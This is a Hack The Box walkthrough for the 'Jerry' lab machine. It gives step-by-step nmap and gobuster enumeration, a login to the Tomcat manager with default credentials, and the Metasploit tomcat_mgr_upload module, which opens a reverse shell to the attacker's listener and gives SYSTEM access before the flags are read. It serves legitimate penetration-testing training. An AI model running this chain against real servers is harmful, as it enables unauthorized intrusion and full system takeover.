Jerry

First you need to copy the IP of the target machine - You can find it in your Hack The Box account. For this walkthrough the IP of the target is 10.129.238.159 but you will have a different one.

As usual let's start with nmap:

nmap -sC -sV 10.129.238.159

We are suggested to try -Pn so let's try:

nmap -sV -Pn 10.129.238.159

Port 8080 is open so let's open our browser and type in the url bar:

10.129.238.159:8080

We get this website

As usual let's first do a gobuster to enumerate any hidden directories on this website. Type:

gobuster dir -u http://10.129.238.159:8080 -w /opt/useful/SecLists/Discovery/Web-Content/common.txt -x php

We can look into each of these directories but one that stands out is /manager so let's open our browser and type the following in the url bar:

10.129.238.159:8080/manager

We are prompted for a login. Let's try our luck and enter admin as username and admin as the password. We get the following error message:

Looks like there are some credentials here. tomcat as the username and s3cret as the password.

Let's try to login again but this time with tomcat and s3cret.

Open the browser and type in the url bar:

10.129.238.159:8080/manager

But this time we are unable to provide our login details and we go straight to the error message.

Let's clear our cookies, close the browser and try again!

This time we get the login page back, so let's enter tomcat as the username and s3cret as the password:

This time we are in!

Now let's google the following "Apache Tomcat Reverse Shell" and see what we can find. The first link seems interesting : https://vk9-sec.com/apache-tomcat-manager-war-reverse-shell/

Let's follow the steps in the article. Looks like they are using 2 metasploit exploits, one to get the credentials (which we already found) and a second exploit to get a shell on the target machine.

First we need to open Metasploit, so from your command prompt, type:

msfconsole

search tomcat

As recommended in the article, let's use auxiliary/scanner/http/tomcat_mgr_login so type:

use auxiliary/scanner/http/tomcat_mgr_login 

Type:

show options

For the exploit to work, we are required to provide the following:

RHOSTS - remote Host

RPORT - remote Port

set RHOSTS 10.129.238.159

set RPORT 8080

now let's run the exploit:

exploit

We get 1 Login Successful with username tomcat and password s3cret

Still following the article above, let's look for the second exploit:

search tomcat_mgr

use exploit/multi/http/tomcat_mgr_upload

show options

We need to provide RHOSTS (remote host) and RPORT (remote port) along with LHOST (local host) and LPORT (local port) for the exploit to work.

set RHOSTS 10.129.238.159

set RPORT 8080

set LHOST 10.10.14.10

For LHOST we provide the IP of our machine. You can find it by opening a new command prompt window on your machine and type ifconfig

set LPORT 4444

Now that we have set up everything, let's run the exploit

exploit

ok it didn't work! that's because it needs a username and a password to access http://10.129.238.159:8080/manager

We found the username and the password earlier. Username is tomcat and password is s3cret so let's set that up too:

set HttpPassword s3cret

set HttpUsername tomcat

exploit

Great! now we got the shell!

First type:

shell

whoami

We are nt authority\system which is a powerful account with unrestricted access to the system!

cd C:/

Flags are often in the C:\Users\Administrator\Desktop directory so let's type:

cd C:\Users\Administrator\Desktop

dir

cd flags

dir

type "2 for the price of 1.txt"

We got both the user flag and the root flag!

Don't forget to copy paste these flags and submit these flags in your Hack The Box account to be able to fully own the Jerry machine.